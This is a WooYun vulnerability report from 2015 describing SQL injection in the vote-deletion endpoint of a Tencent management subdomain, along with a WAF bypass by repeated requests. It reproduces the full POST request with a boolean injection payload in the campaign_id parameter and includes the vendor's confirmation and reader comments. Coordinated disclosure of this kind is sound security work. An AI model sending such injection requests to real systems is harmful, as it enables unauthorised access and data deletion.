当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094367

漏洞标题:腾讯某分站多个参数sql注射(及waf绕过漏)

相关厂商:腾讯

漏洞作者: Jannock

提交时间:2015-01-28 15:47

修复时间:2015-03-14 15:48

公开时间:2015-03-14 15:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-28: 细节已通知厂商并且等待厂商处理中
2015-01-29: 厂商已经确认,细节仅向厂商公开
2015-02-08: 细节向核心白帽子及相关领域专家公开
2015-02-18: 细节向普通白帽子公开
2015-02-28: 细节向实习白帽子公开
2015-03-14: 细节向公众公开

简要描述:

您们一直问我怎么绕过waf,这次告诉你其中之一。

详细说明:

站点 http://manage.events.qq.com/
投票管理 删除操作处,存在SQL注射。没有猜出是什么数据库类型,但确实是存在SQL注射。

1.png


POST /vote/delete HTTP/1.1
Host: manage.events.qq.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://manage.events.qq.com/vote/list?campaign_id=5430
Content-Length: 50
Cookie:
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
campaign_id=5430and 1=2&vote_id=663&g_tk=750636798


campaign_id 和 vote_id
存在注射
没有深入,好像不是常见数据库类型。。
不过是删除操作,危害就不用说了。
waf的绕过,估计是你们 waf 性能太差了,多次请求会有漏掉的拦截。。

漏洞证明:

11.png


12.png


14.png


绕过证明:

1.jpg


2.jpg

修复方案:

您们比较熟悉业务。

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-01-29 14:33

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-29 14:38 | tpp ( 路人 | Rank:0 漏洞数:1 | 业余科研)

    沙发

  2. 2015-01-29 14:39 | ppt ( 路人 | Rank:11 漏洞数:2 | ) | ( 我猜出了用户名,可我没猜出密码。)

    好紧张,看看一哥怎么绕

  3. 2015-01-29 16:21 | tpp ( 路人 | Rank:0 漏洞数:1 | 业余科研)

    @ppt 呵呵

  4. 2015-01-31 16:20 | 蛇精病 ( 路人 | Rank:23 漏洞数:10 | 你连棒棒糖都没有,还谈什么狗屁爱情?)

    @ppt @tpp 楼上你们俩是哥俩吗